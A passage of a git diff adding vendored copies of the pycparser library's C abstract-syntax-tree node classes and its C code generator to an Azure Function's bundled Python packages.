nodelist.append(("lvalue", self.lvalue)) + if self.rvalue is not None: nodelist.append(("rvalue", self.rvalue)) + return tuple(nodelist) + + def __iter__(self): + if self.lvalue is not None: + yield self.lvalue + if self.rvalue is not None: + yield self.rvalue + + attr_names = ('op', ) + +class Alignas(Node): + __slots__ = ('alignment', 'coord', '__weakref__') + def __init__(self, alignment, coord=None): + self.alignment = alignment + self.coord = coord + + def children(self): + nodelist = [] + if self.alignment is not None: nodelist.append(("alignment", self.alignment)) + return tuple(nodelist) + + def __iter__(self): + if self.alignment is not None: + yield self.alignment + + attr_names = () + +class BinaryOp(Node): + __slots__ = ('op', 'left', 'right', 'coord', '__weakref__') + def __init__(self, op, left, right, coord=None): + self.op = op + self.left = left + self.right = right + self.coord = coord + + def children(self): + nodelist = [] + if self.left is not None: nodelist.append(("left", self.left)) + if self.right is not None: nodelist.append(("right", self.right)) + return tuple(nodelist) + + def __iter__(self): + if self.left is not None: + yield self.left + if self.right is not None: + yield self.right + + attr_names = ('op', ) + +class Break(Node): + __slots__ = ('coord', '__weakref__') + def __init__(self, coord=None): + self.coord = coord + + def children(self): + return () + + def __iter__(self): + return + yield + + attr_names = () + +class Case(Node): + __slots__ = ('expr', 'stmts', 'coord', '__weakref__') + def __init__(self, expr, stmts, coord=None): + self.expr = expr + self.stmts = stmts + self.coord = coord + + def children(self): + nodelist = [] + if self.expr is not None: nodelist.append(("expr", self.expr)) + for i, child in enumerate(self.stmts or []): + nodelist.append(("stmts[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + if self.expr is not None: + yield self.expr + for child in (self.stmts or []): + yield child + + attr_names = () + +class Cast(Node): + __slots__ = ('to_type', 'expr', 'coord', '__weakref__') + def __init__(self, to_type, expr, coord=None): + self.to_type = to_type + self.expr = expr + self.coord = coord + + def children(self): + nodelist = [] + if self.to_type is not None: nodelist.append(("to_type", self.to_type)) + if self.expr is not None: nodelist.append(("expr", self.expr)) + return tuple(nodelist) + + def __iter__(self): + if self.to_type is not None: + yield self.to_type + if self.expr is not None: + yield self.expr + + attr_names = () + +class Compound(Node): + __slots__ = ('block_items', 'coord', '__weakref__') + def __init__(self, block_items, coord=None): + self.block_items = block_items + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.block_items or []): + nodelist.append(("block_items[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.block_items or []): + yield child + + attr_names = () + +class CompoundLiteral(Node): + __slots__ = ('type', 'init', 'coord', '__weakref__') + def __init__(self, type, init, coord=None): + self.type = type + self.init = init + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + if self.init is not None: nodelist.append(("init", self.init)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + if self.init is not None: + yield self.init + + attr_names = () + +class Constant(Node): + __slots__ = ('type', 'value', 'coord', '__weakref__') + def __init__(self, type, value, coord=None): + self.type = type + self.value = value + self.coord = coord + + def children(self): + nodelist = [] + return tuple(nodelist) + + def __iter__(self): + return + yield + + attr_names = ('type', 'value', ) + +class Continue(Node): + __slots__ = ('coord', '__weakref__') + def __init__(self, coord=None): + self.coord = coord + + def children(self): + return () + + def __iter__(self): + return + yield + + attr_names = () + +class Decl(Node): + __slots__ = ('name', 'quals', 'align', 'storage', 'funcspec', 'type', 'init', 'bitsize', 'coord', '__weakref__') + def __init__(self, name, quals, align, storage, funcspec, type, init, bitsize, coord=None): + self.name = name + self.quals = quals + self.align = align + self.storage = storage + self.funcspec = funcspec + self.type = type + self.init = init + self.bitsize = bitsize + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + if self.init is not None: nodelist.append(("init", self.init)) + if self.bitsize is not None: nodelist.append(("bitsize", self.bitsize)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + if self.init is not None: + yield self.init + if self.bitsize is not None: + yield self.bitsize + + attr_names = ('name', 'quals', 'align', 'storage', 'funcspec', ) + +class DeclList(Node): + __slots__ = ('decls', 'coord', '__weakref__') + def __init__(self, decls, coord=None): + self.decls = decls + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.decls or []): + nodelist.append(("decls[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.decls or []): + yield child + + attr_names = () + +class Default(Node): + __slots__ = ('stmts', 'coord', '__weakref__') + def __init__(self, stmts, coord=None): + self.stmts = stmts + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.stmts or []): + nodelist.append(("stmts[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.stmts or []): + yield child + + attr_names = () + +class DoWhile(Node): + __slots__ = ('cond', 'stmt', 'coord', '__weakref__') + def __init__(self, cond, stmt, coord=None): + self.cond = cond + self.stmt = stmt + self.coord = coord + + def children(self): + nodelist = [] + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.stmt is not None: nodelist.append(("stmt", self.stmt)) + return tuple(nodelist) + + def __iter__(self): + if self.cond is not None: + yield self.cond + if self.stmt is not None: + yield self.stmt + + attr_names = () + +class EllipsisParam(Node): + __slots__ = ('coord', '__weakref__') + def __init__(self, coord=None): + self.coord = coord + + def children(self): + return () + + def __iter__(self): + return + yield + + attr_names = () + +class EmptyStatement(Node): + __slots__ = ('coord', '__weakref__') + def __init__(self, coord=None): + self.coord = coord + + def children(self): + return () + + def __iter__(self): + return + yield + + attr_names = () + +class Enum(Node): + __slots__ = ('name', 'values', 'coord', '__weakref__') + def __init__(self, name, values, coord=None): + self.name = name + self.values = values + self.coord = coord + + def children(self): + nodelist = [] + if self.values is not None: nodelist.append(("values", self.values)) + return tuple(nodelist) + + def __iter__(self): + if self.values is not None: + yield self.values + + attr_names = ('name', ) + +class Enumerator(Node): + __slots__ = ('name', 'value', 'coord', '__weakref__') + def __init__(self, name, value, coord=None): + self.name = name + self.value = value + self.coord = coord + + def children(self): + nodelist = [] + if self.value is not None: nodelist.append(("value", self.value)) + return tuple(nodelist) + + def __iter__(self): + if self.value is not None: + yield self.value + + attr_names = ('name', ) + +class EnumeratorList(Node): + __slots__ = ('enumerators', 'coord', '__weakref__') + def __init__(self, enumerators, coord=None): + self.enumerators = enumerators + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.enumerators or []): + nodelist.append(("enumerators[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.enumerators or []): + yield child + + attr_names = () + +class ExprList(Node): + __slots__ = ('exprs', 'coord', '__weakref__') + def __init__(self, exprs, coord=None): + self.exprs = exprs + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.exprs or []): + nodelist.append(("exprs[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.exprs or []): + yield child + + attr_names = () + +class FileAST(Node): + __slots__ = ('ext', 'coord', '__weakref__') + def __init__(self, ext, coord=None): + self.ext = ext + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.ext or []): + nodelist.append(("ext[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.ext or []): + yield child + + attr_names = () + +class For(Node): + __slots__ = ('init', 'cond', 'next', 'stmt', 'coord', '__weakref__') + def __init__(self, init, cond, next, stmt, coord=None): + self.init = init + self.cond = cond + self.next = next + self.stmt = stmt + self.coord = coord + + def children(self): + nodelist = [] + if self.init is not None: nodelist.append(("init", self.init)) + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.next is not None: nodelist.append(("next", self.next)) + if self.stmt is not None: nodelist.append(("stmt", self.stmt)) + return tuple(nodelist) + + def __iter__(self): + if self.init is not None: + yield self.init + if self.cond is not None: + yield self.cond + if self.next is not None: + yield self.next + if self.stmt is not None: + yield self.stmt + + attr_names = () + +class FuncCall(Node): + __slots__ = ('name', 'args', 'coord', '__weakref__') + def __init__(self, name, args, coord=None): + self.name = name + self.args = args + self.coord = coord + + def children(self): + nodelist = [] + if self.name is not None: nodelist.append(("name", self.name)) + if self.args is not None: nodelist.append(("args", self.args)) + return tuple(nodelist) + + def __iter__(self): + if self.name is not None: + yield self.name + if self.args is not None: + yield self.args + + attr_names = () + +class FuncDecl(Node): + __slots__ = ('args', 'type', 'coord', '__weakref__') + def __init__(self, args, type, coord=None): + self.args = args + self.type = type + self.coord = coord + + def children(self): + nodelist = [] + if self.args is not None: nodelist.append(("args", self.args)) + if self.type is not None: nodelist.append(("type", self.type)) + return tuple(nodelist) + + def __iter__(self): + if self.args is not None: + yield self.args + if self.type is not None: + yield self.type + + attr_names = () + +class FuncDef(Node): + __slots__ = ('decl', 'param_decls', 'body', 'coord', '__weakref__') + def __init__(self, decl, param_decls, body, coord=None): + self.decl = decl + self.param_decls = param_decls + self.body = body + self.coord = coord + + def children(self): + nodelist = [] + if self.decl is not None: nodelist.append(("decl", self.decl)) + if self.body is not None: nodelist.append(("body", self.body)) + for i, child in enumerate(self.param_decls or []): + nodelist.append(("param_decls[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + if self.decl is not None: + yield self.decl + if self.body is not None: + yield self.body + for child in (self.param_decls or []): + yield child + + attr_names = () + +class Goto(Node): + __slots__ = ('name', 'coord', '__weakref__') + def __init__(self, name, coord=None): + self.name = name + self.coord = coord + + def children(self): + nodelist = [] + return tuple(nodelist) + + def __iter__(self): + return + yield + + attr_names = ('name', ) + +class ID(Node): + __slots__ = ('name', 'coord', '__weakref__') + def __init__(self, name, coord=None): + self.name = name + self.coord = coord + + def children(self): + nodelist = [] + return tuple(nodelist) + + def __iter__(self): + return + yield + + attr_names = ('name', ) + +class IdentifierType(Node): + __slots__ = ('names', 'coord', '__weakref__') + def __init__(self, names, coord=None): + self.names = names + self.coord = coord + + def children(self): + nodelist = [] + return tuple(nodelist) + + def __iter__(self): + return + yield + + attr_names = ('names', ) + +class If(Node): + __slots__ = ('cond', 'iftrue', 'iffalse', 'coord', '__weakref__') + def __init__(self, cond, iftrue, iffalse, coord=None): + self.cond = cond + self.iftrue = iftrue + self.iffalse = iffalse + self.coord = coord + + def children(self): + nodelist = [] + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.iftrue is not None: nodelist.append(("iftrue", self.iftrue)) + if self.iffalse is not None: nodelist.append(("iffalse", self.iffalse)) + return tuple(nodelist) + + def __iter__(self): + if self.cond is not None: + yield self.cond + if self.iftrue is not None: + yield self.iftrue + if self.iffalse is not None: + yield self.iffalse + + attr_names = () + +class InitList(Node): + __slots__ = ('exprs', 'coord', '__weakref__') + def __init__(self, exprs, coord=None): + self.exprs = exprs + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.exprs or []): + nodelist.append(("exprs[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.exprs or []): + yield child + + attr_names = () + +class Label(Node): + __slots__ = ('name', 'stmt', 'coord', '__weakref__') + def __init__(self, name, stmt, coord=None): + self.name = name + self.stmt = stmt + self.coord = coord + + def children(self): + nodelist = [] + if self.stmt is not None: nodelist.append(("stmt", self.stmt)) + return tuple(nodelist) + + def __iter__(self): + if self.stmt is not None: + yield self.stmt + + attr_names = ('name', ) + +class NamedInitializer(Node): + __slots__ = ('name', 'expr', 'coord', '__weakref__') + def __init__(self, name, expr, coord=None): + self.name = name + self.expr = expr + self.coord = coord + + def children(self): + nodelist = [] + if self.expr is not None: nodelist.append(("expr", self.expr)) + for i, child in enumerate(self.name or []): + nodelist.append(("name[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + if self.expr is not None: + yield self.expr + for child in (self.name or []): + yield child + + attr_names = () + +class ParamList(Node): + __slots__ = ('params', 'coord', '__weakref__') + def __init__(self, params, coord=None): + self.params = params + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.params or []): + nodelist.append(("params[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.params or []): + yield child + + attr_names = () + +class PtrDecl(Node): + __slots__ = ('quals', 'type', 'coord', '__weakref__') + def __init__(self, quals, type, coord=None): + self.quals = quals + self.type = type + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + + attr_names = ('quals', ) + +class Return(Node): + __slots__ = ('expr', 'coord', '__weakref__') + def __init__(self, expr, coord=None): + self.expr = expr + self.coord = coord + + def children(self): + nodelist = [] + if self.expr is not None: nodelist.append(("expr", self.expr)) + return tuple(nodelist) + + def __iter__(self): + if self.expr is not None: + yield self.expr + + attr_names = () + +class StaticAssert(Node): + __slots__ = ('cond', 'message', 'coord', '__weakref__') + def __init__(self, cond, message, coord=None): + self.cond = cond + self.message = message + self.coord = coord + + def children(self): + nodelist = [] + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.message is not None: nodelist.append(("message", self.message)) + return tuple(nodelist) + + def __iter__(self): + if self.cond is not None: + yield self.cond + if self.message is not None: + yield self.message + + attr_names = () + +class Struct(Node): + __slots__ = ('name', 'decls', 'coord', '__weakref__') + def __init__(self, name, decls, coord=None): + self.name = name + self.decls = decls + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.decls or []): + nodelist.append(("decls[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.decls or []): + yield child + + attr_names = ('name', ) + +class StructRef(Node): + __slots__ = ('name', 'type', 'field', 'coord', '__weakref__') + def __init__(self, name, type, field, coord=None): + self.name = name + self.type = type + self.field = field + self.coord = coord + + def children(self): + nodelist = [] + if self.name is not None: nodelist.append(("name", self.name)) + if self.field is not None: nodelist.append(("field", self.field)) + return tuple(nodelist) + + def __iter__(self): + if self.name is not None: + yield self.name + if self.field is not None: + yield self.field + + attr_names = ('type', ) + +class Switch(Node): + __slots__ = ('cond', 'stmt', 'coord', '__weakref__') + def __init__(self, cond, stmt, coord=None): + self.cond = cond + self.stmt = stmt + self.coord = coord + + def children(self): + nodelist = [] + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.stmt is not None: nodelist.append(("stmt", self.stmt)) + return tuple(nodelist) + + def __iter__(self): + if self.cond is not None: + yield self.cond + if self.stmt is not None: + yield self.stmt + + attr_names = () + +class TernaryOp(Node): + __slots__ = ('cond', 'iftrue', 'iffalse', 'coord', '__weakref__') + def __init__(self, cond, iftrue, iffalse, coord=None): + self.cond = cond + self.iftrue = iftrue + self.iffalse = iffalse + self.coord = coord + + def children(self): + nodelist = [] + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.iftrue is not None: nodelist.append(("iftrue", self.iftrue)) + if self.iffalse is not None: nodelist.append(("iffalse", self.iffalse)) + return tuple(nodelist) + + def __iter__(self): + if self.cond is not None: + yield self.cond + if self.iftrue is not None: + yield self.iftrue + if self.iffalse is not None: + yield self.iffalse + + attr_names = () + +class TypeDecl(Node): + __slots__ = ('declname', 'quals', 'align', 'type', 'coord', '__weakref__') + def __init__(self, declname, quals, align, type, coord=None): + self.declname = declname + self.quals = quals + self.align = align + self.type = type + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + + attr_names = ('declname', 'quals', 'align', ) + +class Typedef(Node): + __slots__ = ('name', 'quals', 'storage', 'type', 'coord', '__weakref__') + def __init__(self, name, quals, storage, type, coord=None): + self.name = name + self.quals = quals + self.storage = storage + self.type = type + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + + attr_names = ('name', 'quals', 'storage', ) + +class Typename(Node): + __slots__ = ('name', 'quals', 'align', 'type', 'coord', '__weakref__') + def __init__(self, name, quals, align, type, coord=None): + self.name = name + self.quals = quals + self.align = align + self.type = type + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + + attr_names = ('name', 'quals', 'align', ) + +class UnaryOp(Node): + __slots__ = ('op', 'expr', 'coord', '__weakref__') + def __init__(self, op, expr, coord=None): + self.op = op + self.expr = expr + self.coord = coord + + def children(self): + nodelist = [] + if self.expr is not None: nodelist.append(("expr", self.expr)) + return tuple(nodelist) + + def __iter__(self): + if self.expr is not None: + yield self.expr + + attr_names = ('op', ) + +class Union(Node): + __slots__ = ('name', 'decls', 'coord', '__weakref__') + def __init__(self, name, decls, coord=None): + self.name = name + self.decls = decls + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.decls or []): + nodelist.append(("decls[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.decls or []): + yield child + + attr_names = ('name', ) + +class While(Node): + __slots__ = ('cond', 'stmt', 'coord', '__weakref__') + def __init__(self, cond, stmt, coord=None): + self.cond = cond + self.stmt = stmt + self.coord = coord + + def children(self): + nodelist = [] + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.stmt is not None: nodelist.append(("stmt", self.stmt)) + return tuple(nodelist) + + def __iter__(self): + if self.cond is not None: + yield self.cond + if self.stmt is not None: + yield self.stmt + + attr_names = () + +class Pragma(Node): + __slots__ = ('string', 'coord', '__weakref__') + def __init__(self, string, coord=None): + self.string = string + self.coord = coord + + def children(self): + nodelist = [] + return tuple(nodelist) + + def __iter__(self): + return + yield + + attr_names = ('string', ) + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_generator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_generator.py new file mode 100644 index 0000000..0d266bc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_generator.py @@ -0,0 +1,502 @@ +#------------------------------------------------------------------------------ +# pycparser: c_generator.py +# +# C code generator from pycparser AST nodes. +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#------------------------------------------------------------------------------ +from . import c_ast + + +class CGenerator(object): + """ Uses the same visitor pattern as c_ast.NodeVisitor, but modified to + return a value from each visit method, using string accumulation in + generic_visit. + """ + def __init__(self, reduce_parentheses=False): + """ Constructs C-code generator + + reduce_parentheses: + if True, eliminates needless parentheses on binary operators + """ + # Statements start with indentation of self.indent_level spaces, using + # the _make_indent method. + self.indent_level = 0 + self.reduce_parentheses = reduce_parentheses + + def _make_indent(self): + return ' ' * self.indent_level + + def visit(self, node): + method = 'visit_' + node.__class__.__name__ + return getattr(self, method, self.generic_visit)(node) + + def generic_visit(self, node): + if node is None: + return '' + else: + return ''.join(self.visit(c) for c_name, c in node.children()) + + def visit_Constant(self, n): + return n.value + + def visit_ID(self, n): + return n.name + + def visit_Pragma(self, n): + ret = '#pragma' + if n.string: + ret += ' ' + n.string + return ret + + def visit_ArrayRef(self, n): + arrref = self._parenthesize_unless_simple(n.name) + return arrref + '[' + self.visit(n.subscript) + ']' + + def visit_StructRef(self, n): + sref = self._parenthesize_unless_simple(n.name) + return sref + n.type + self.visit(n.field) + + def visit_FuncCall(self, n): + fref = self._parenthesize_unless_simple(n.name) + return fref + '(' + self.visit(n.args) + ')' + + def visit_UnaryOp(self, n): + if n.op == 'sizeof': + # Always parenthesize the argument of sizeof since it can be + # a name. + return 'sizeof(%s)' % self.visit(n.expr) + else: + operand = self._parenthesize_unless_simple(n.expr) + if n.op == 'p++': + return '%s++' % operand + elif n.op == 'p--': + return '%s--' % operand + else: + return '%s%s' % (n.op, operand) + + # Precedence map of binary operators: + precedence_map = { + # Should be in sync with c_parser.CParser.precedence + # Higher numbers are stronger binding + '||': 0, # weakest binding + '&&': 1, + '|': 2, + '^': 3, + '&': 4, + '==': 5, '!=': 5, + '>': 6, '>=': 6, '<': 6, '<=': 6, + '>>': 7, '<<': 7, + '+': 8, '-': 8, + '*': 9, '/': 9, '%': 9 # strongest binding + } + + def visit_BinaryOp(self, n): + # Note: all binary operators are left-to-right associative + # + # If `n.left.op` has a stronger or equally binding precedence in + # comparison to `n.op`, no parenthesis are needed for the left: + # e.g., `(a*b) + c` is equivalent to `a*b + c`, as well as + # `(a+b) - c` is equivalent to `a+b - c` (same precedence). + # If the left operator is weaker binding than the current, then + # parentheses are necessary: + # e.g., `(a+b) * c` is NOT equivalent to `a+b * c`. + lval_str = self._parenthesize_if( + n.left, + lambda d: not (self._is_simple_node(d) or + self.reduce_parentheses and isinstance(d, c_ast.BinaryOp) and + self.precedence_map[d.op] >= self.precedence_map[n.op])) + # If `n.right.op` has a stronger -but not equal- binding precedence, + # parenthesis can be omitted on the right: + # e.g., `a + (b*c)` is equivalent to `a + b*c`. + # If the right operator is weaker or equally binding, then parentheses + # are necessary: + # e.g., `a * (b+c)` is NOT equivalent to `a * b+c` and + # `a - (b+c)` is NOT equivalent to `a - b+c` (same precedence). + rval_str = self._parenthesize_if( + n.right, + lambda d: not (self._is_simple_node(d) or + self.reduce_parentheses and isinstance(d, c_ast.BinaryOp) and + self.precedence_map[d.op] > self.precedence_map[n.op])) + return '%s %s %s' % (lval_str, n.op, rval_str) + + def visit_Assignment(self, n): + rval_str = self._parenthesize_if( + n.rvalue, + lambda n: isinstance(n, c_ast.Assignment)) + return '%s %s %s' % (self.visit(n.lvalue), n.op, rval_str) + + def visit_IdentifierType(self, n): + return ' '.join(n.names) + + def _visit_expr(self, n): + if isinstance(n, c_ast.InitList): + return '{' + self.visit(n) + '}' + elif isinstance(n, c_ast.ExprList): + return '(' + self.visit(n) + ')' + else: + return self.visit(n) + + def visit_Decl(self, n, no_type=False): + # no_type is used when a Decl is part of a DeclList, where the type is + # explicitly only for the first declaration in a list. + # + s = n.name if no_type else self._generate_decl(n) + if n.bitsize: s += ' : ' + self.visit(n.bitsize) + if n.init: + s += ' = ' + self._visit_expr(n.init) + return s + + def visit_DeclList(self, n): + s = self.visit(n.decls[0]) + if len(n.decls) > 1: + s += ', ' + ', '.join(self.visit_Decl(decl, no_type=True) + for decl in n.decls[1:]) + return s + + def visit_Typedef(self, n): + s = '' + if n.storage: s += ' '.join(n.storage) + ' ' + s += self._generate_type(n.type) + return s + + def visit_Cast(self, n): + s = '(' + self._generate_type(n.to_type, emit_declname=False) + ')' + return s + ' ' + self._parenthesize_unless_simple(n.expr) + + def visit_ExprList(self, n): + visited_subexprs = [] + for expr in n.exprs: + visited_subexprs.append(self._visit_expr(expr)) + return ', '.join(visited_subexprs) + + def visit_InitList(self, n): + visited_subexprs = [] + for expr in n.exprs: + visited_subexprs.append(self._visit_expr(expr)) + return ', '.join(visited_subexprs) + + def visit_Enum(self, n): + return self._generate_struct_union_enum(n, name='enum') + + def visit_Alignas(self, n): + return '_Alignas({})'.format(self.visit(n.alignment)) + + def visit_Enumerator(self, n): + if not n.value: + return '{indent}{name},\n'.format( + indent=self._make_indent(), + name=n.name, + ) + else: + return '{indent}{name} = {value},\n'.format( + indent=self._make_indent(), + name=n.name, + value=self.visit(n.value), + ) + + def visit_FuncDef(self, n): + decl = self.visit(n.decl) + self.indent_level = 0 + body = self.visit(n.body) + if n.param_decls: + knrdecls = ';\n'.join(self.visit(p) for p in n.param_decls) + return decl + '\n' + knrdecls + ';\n' + body + '\n' + else: + return decl + '\n' + body + '\n' + + def visit_FileAST(self, n): + s = '' + for ext in n.ext: + if isinstance(ext, c_ast.FuncDef): + s += self.visit(ext) + elif isinstance(ext, c_ast.Pragma): + s += self.visit(ext) + '\n' + else: + s += self.visit(ext) + ';\n' + return s + + def visit_Compound(self, n): + s = self._make_indent() + '{\n' + self.indent_level += 2 + if n.block_items: + s += ''.join(self._generate_stmt(stmt) for stmt in n.block_items) + self.indent_level -= 2 + s += self._make_indent() + '}\n' + return s + + def visit_CompoundLiteral(self, n): + return '(' + self.visit(n.type) + '){' + self.visit(n.init) + '}' + + + def visit_EmptyStatement(self, n): + return ';' + + def visit_ParamList(self, n): + return ', '.join(self.visit(param) for param in n.params) + + def visit_Return(self, n): + s = 'return' + if n.expr: s += ' ' + self.visit(n.expr) + return s + ';' + + def visit_Break(self, n): + return 'break;' + + def visit_Continue(self, n): + return 'continue;' + + def visit_TernaryOp(self, n): + s = '(' + self._visit_expr(n.cond) + ') ? ' + s += '(' + self._visit_expr(n.iftrue) + ') : ' + s += '(' + self._visit_expr(n.iffalse) + ')' + return s + + def visit_If(self, n): + s = 'if (' + if n.cond: s += self.visit(n.cond) + s += ')\n' + s += self._generate_stmt(n.iftrue, add_indent=True) + if n.iffalse: + s += self._make_indent() + 'else\n' + s += self._generate_stmt(n.iffalse, add_indent=True) + return s + + def visit_For(self, n): + s = 'for (' + if n.init: s += self.visit(n.init) + s += ';' + if n.cond: s += ' ' + self.visit(n.cond) + s += ';' + if n.next: s += ' ' + self.visit(n.next) + s += ')\n' + s += self._generate_stmt(n.stmt, add_indent=True) + return s + + def visit_While(self, n): + s = 'while (' + if n.cond: s += self.visit(n.cond) + s += ')\n' + s += self._generate_stmt(n.stmt, add_indent=True) + return s + + def visit_DoWhile(self, n): + s = 'do\n' + s += self._generate_stmt(n.stmt, add_indent=True) + s += self._make_indent() + 'while (' + if n.cond: s += self.visit(n.cond) + s += ');' + return s + + def visit_StaticAssert(self, n): + s = '_Static_assert(' + s += self.visit(n.cond) + if n.message: + s += ',' + s += self.visit(n.message) + s += ')' + return s + + def visit_Switch(self, n): + s = 'switch (' + self.visit(n.cond) + ')\n' + s += self._generate_stmt(n.stmt, add_indent=True) + return s + + def visit_Case(self, n): + s = 'case ' + self.visit(n.expr) + ':\n' + for stmt in n.stmts: + s += self._generate_stmt(stmt, add_indent=True) + return s + + def visit_Default(self, n): + s = 'default:\n' + for stmt in n.stmts: + s += self._generate_stmt(stmt, add_indent=True) + return s + + def visit_Label(self, n): + return n.name + ':\n' + self._generate_stmt(n.stmt) + + def visit_Goto(self, n): + return 'goto ' + n.name + ';' + + def visit_EllipsisParam(self, n): + return '...' + + def visit_Struct(self, n): + return self._generate_struct_union_enum(n, 'struct') + + def visit_Typename(self, n): + return self._generate_type(n.type) + + def visit_Union(self, n): + return self._generate_struct_union_enum(n, 'union') + + def visit_NamedInitializer(self, n): + s = '' + for name in n.name: + if isinstance(name, c_ast.ID): + s += '.' + name.name + else: + s += '[' + self.visit(name) + ']' + s += ' = ' + self._visit_expr(n.expr) + return s + + def visit_FuncDecl(self, n): + return self._generate_type(n) + + def visit_ArrayDecl(self, n): + return self._generate_type(n, emit_declname=False) + + def visit_TypeDecl(self, n): + return self._generate_type(n, emit_declname=False) + + def visit_PtrDecl(self, n): + return self._generate_type(n, emit_declname=False) + + def _generate_struct_union_enum(self, n, name): + """ Generates code for structs, unions, and enums. name should be + 'struct', 'union', or 'enum'. + """ + if name in ('struct', 'union'): + members = n.decls + body_function = self._generate_struct_union_body + else: + assert name == 'enum' + members = None if n.values is None else n.values.enumerators + body_function = self._generate_enum_body + s = name + ' ' + (n.name or '') + if members is not None: + # None means no members + # Empty sequence means an empty list of members + s += '\n' + s += self._make_indent() + self.indent_level += 2 + s += '{\n' + s += body_function(members) + self.indent_level -= 2 + s += self._make_indent() + '}' + return s + + def _generate_struct_union_body(self, members): + return ''.join(self._generate_stmt(decl) for decl in members) + + def _generate_enum_body(self, members): + # `[:-2] + '\n'` removes the final `,` from the enumerator list + return ''.join(self.visit(value) for value in members)[:-2] + '\n' + + def _generate_stmt(self, n, add_indent=False): + """ Generation from a statement node. This method exists as a wrapper + for individual visit_* methods to handle different treatment of + some statements in this context. + """ + typ = type(n) + if add_indent: self.indent_level += 2 + indent = self._make_indent() + if add_indent: self.indent_level -= 2 + + if typ in ( + c_ast.Decl, c_ast.Assignment, c_ast.Cast, c_ast.UnaryOp, + c_ast.BinaryOp, c_ast.TernaryOp, c_ast.FuncCall, c_ast.ArrayRef, + c_ast.StructRef, c_ast.Constant, c_ast.ID, c_ast.Typedef, + c_ast.ExprList): + # These can also appear in an expression context so no semicolon + # is added to them automatically + # + return indent + self.visit(n) + ';\n' + elif typ in (c_ast.Compound,): + # No extra indentation required before the opening brace of a + # compound - because it consists of multiple lines it has to + # compute its own indentation. + # + return self.visit(n) + elif typ in (c_ast.If,): + return indent + self.visit(n) + else: + return indent + self.visit(n) + '\n' + + def _generate_decl(self, n): + """ Generation from a Decl node. + """ + s = '' + if n.funcspec: s = ' '.join(n.funcspec) + ' ' + if n.storage: s += ' '.join(n.storage) + ' ' + if n.align: s += self.visit(n.align[0]) + ' ' + s += self._generate_type(n.type) + return s + + def _generate_type(self, n, modifiers=[], emit_declname = True): + """ Recursive generation from a type node. n is the type node. + modifiers collects the PtrDecl, ArrayDecl and FuncDecl modifiers + encountered on the way down to a TypeDecl, to allow proper + generation from it. + """ + typ = type(n) + #~ print(n, modifiers) + + if typ == c_ast.TypeDecl: + s = '' + if n.quals: s += ' '.join(n.quals) + ' ' + s += self.visit(n.type) + + nstr = n.declname if n.declname and emit_declname else '' + # Resolve modifiers. + # Wrap in parens to distinguish pointer to array and pointer to + # function syntax. + # + for i, modifier in enumerate(modifiers): + if isinstance(modifier, c_ast.ArrayDecl): + if (i != 0 and + isinstance(modifiers[i - 1], c_ast.PtrDecl)): + nstr = '(' + nstr + ')' + nstr += '[' + if modifier.dim_quals: + nstr += ' '.join(modifier.dim_quals) + ' ' + nstr += self.visit(modifier.dim) + ']' + elif isinstance(modifier, c_ast.FuncDecl): + if (i != 0 and + isinstance(modifiers[i - 1], c_ast.PtrDecl)): + nstr = '(' + nstr + ')' + nstr += '(' + self.visit(modifier.args) + ')' + elif isinstance(modifier, c_ast.PtrDecl): + if modifier.quals: + nstr = '* %s%s' % (' '.join(modifier.quals), + ' ' + nstr if nstr else '') + else: + nstr = '*' + nstr + if nstr: s += ' ' + nstr + return s + elif typ == c_ast.Decl: + return 